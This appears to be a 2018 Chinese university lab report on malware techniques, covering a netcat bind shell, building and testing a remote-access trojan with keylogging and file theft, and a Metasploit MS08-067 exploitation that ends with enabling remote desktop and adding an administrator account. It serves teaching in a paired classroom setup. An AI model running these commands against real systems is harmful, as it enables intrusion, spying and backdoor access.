實驗四
中國人民公安大學
Chinese people’ public security university
網(wǎng)絡對抗技術(shù)
實驗報告
|
實驗四 |
|
惡意代碼技術(shù) |
|
學生姓名 |
陳雨龍 |
|
年級 |
2015 |
|
區(qū)隊 |
三 |
|
指導教師 |
高見 |
信息技術(shù)與網(wǎng)絡安全學院
2018年10月19日
實驗任務總綱
2018—2019學年 第一 學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關(guān)知識,加深對木馬的安全防范意識。
2.了解并熟悉常用的網(wǎng)絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內(nèi)容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。
2.文檔要求結(jié)構(gòu)清晰,圖文表達準確,標注規(guī)范。推理內(nèi)容客觀、合理、邏輯性強。
3.軟件工具可使用NC、MSF等。
4.實驗結(jié)束后,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內(nèi)容,熟悉并準備好實驗用的軟件工具,按照實驗內(nèi)容和要求提前做好實驗內(nèi)容的準備。
2.實驗環(huán)境
描述實驗所使用的硬件和軟件環(huán)境(包括各種軟件工具);
開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。
3.實驗過程
1)啟動系統(tǒng)和啟動工具軟件環(huán)境。
2)用軟件工具實現(xiàn)實驗內(nèi)容。
4.實驗報告
按照統(tǒng)一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規(guī)定的書寫格式書寫,表格要有表說圖形要有圖說。
任務一利用NC控制電腦
NetCat,具有網(wǎng)絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現(xiàn)在已經(jīng)壓縮到只有十幾KB,而且在功能上絲毫不減。
實驗過程需要兩個同學相互配合完成:
步驟一:
在受害者的機器 (同學A)
輸入下面的命令:
nc.exe -l -p port -e cmd.exe 進入監(jiān)聽模式

步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip port //連接victim_IP,然后得到一個shell。 (需要截圖)

步驟三:
在shell中,利用net user 用戶名 密碼 /add ,添加一個用戶,并在受害者的機器中使用 net user 命令進行驗證。(需要截圖)

可以繼續(xù)通過命令行做一些事情。

任務二利用木馬控制電腦
實驗過程需要兩個同學配合:
步驟一:
攻擊者的機器. (同學A)
打開V2014.exe程序或則star RAT,這兩個木馬功能類似。

步驟二:
點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。

步驟三:
將生成的木馬可執(zhí)行程序拷貝到受害者的機器,并雙擊運行。 
步驟四:
在控制端中查看木馬上線情況,并對以下功能每個進行測試和截圖。
- 文件管理,嘗試拷貝文件

- 屏幕控制,嘗試獲取桌面

- 鍵盤記錄,嘗試獲取對方擊鍵記錄

- 會話管理,重啟對方機器,查看是否能自啟動上線(重啟了圖就截不了了,所以沒做)
會話管理,卸載對方的木馬。

任務三通過漏洞獲取shell 所有過程截圖寫博客
windows ms08067 漏洞利用
一.1 知識背景
Metasploit是一款開源的安全漏洞檢測工具,Metasploit Framework (MSF) 在2003年以開放源碼方式發(fā)布,是可以自由獲取的開發(fā)框架。它是一個強大的開源平臺,供開發(fā),測試和使用惡意代碼,這個環(huán)境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠平臺。這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平臺上常見的溢出漏洞和流行的 shellcode ,并且不斷更新。 Metasploit Framework并不止具有exploit(溢出)收集功能,它使你專注于創(chuàng)建自己的溢出模塊或者二次開發(fā)。很少的一部分用匯編和C語言實現(xiàn),其余均由ruby實現(xiàn)。總體架構(gòu):

一.2 實訓環(huán)境
Windows XP SP3
IP:192.168.1.129
Kali Linux
IP:172.16.211.128
一.3 實訓原理
漏洞名稱:Windows Server服務RPC請求緩沖區(qū)溢出漏洞(MS08-067)此安全更新解決了服務器服務中一個秘密報告的漏洞。如果用戶在受影響的系統(tǒng)上收到特制的 RPC 請求,則該漏洞可能允許遠程執(zhí)行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統(tǒng)上,攻擊者可能未經(jīng)身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用于進行蠕蟲攻擊。 防火墻最佳做法和標準的默認防火墻配置有助于保護網(wǎng)絡資源免受從企業(yè)外部發(fā)起的攻擊。
一.4 漏洞利用過程
在msfconsole使用search命令搜索MS08067漏洞攻擊程序

從結(jié)果中得到
exploit/windows/smb/ms08_067_netapi
表示當前msf框架中包含MS08067漏洞的攻擊插件。
使用use命令調(diào)用MS08067漏洞攻擊程序
use exploit/windows/smb/ms08_067_netapi

進入msf的交互式命令窗口下,使用show options 命令查看需要設置的選項。

從圖中可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)使用 set 命令設置 Module Options,此處需要設置目標IP即 set RHOST 192.168.1.129
使用 set 命令設置后,可再使用show options 命令查看設置情況

從中可以看出目標IP已經(jīng)設置好接著設置Exploit target,使用show targets 查看可選項可以看出以下版本的系統(tǒng)均存在此漏洞。因為實例演示的XP系統(tǒng)為WinXP SP3 簡體中文版對應的編號為34

使用set target 命令設置目標,此處即為set target 34,

此時再用show options 可以看到全部設置完成。

接著使用exploit 或者 run 進行攻擊。
執(zhí)行exploit命令后得到一個meterpreter命令行交互窗口。

在meterpreter中輸入run getgui -e 命令,可以打開RDP(遠程桌面)服務,端口號3389。

繼續(xù)輸入shell即可進入CMD窗口

在cmd命令下也可以通過添加注冊表項的方式開啟對方遠程桌面服務(如果上面已經(jīng)開啟了,這步可以省略)。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat -an命令查看端口是否開放,從圖中可以看到已經(jīng)開放3389端口。

接著使用net user命令查看XP系統(tǒng)中的用戶

在平臺中獲取shell之后,繼續(xù)在命令行添加賬戶和管理員權(quán)限。
net user user pass /add 
例如:net user wt wt123 /add
net localgroup administrators /add
例如:net localgroup administrators wt /add
浙公網(wǎng)安備 33010602011771號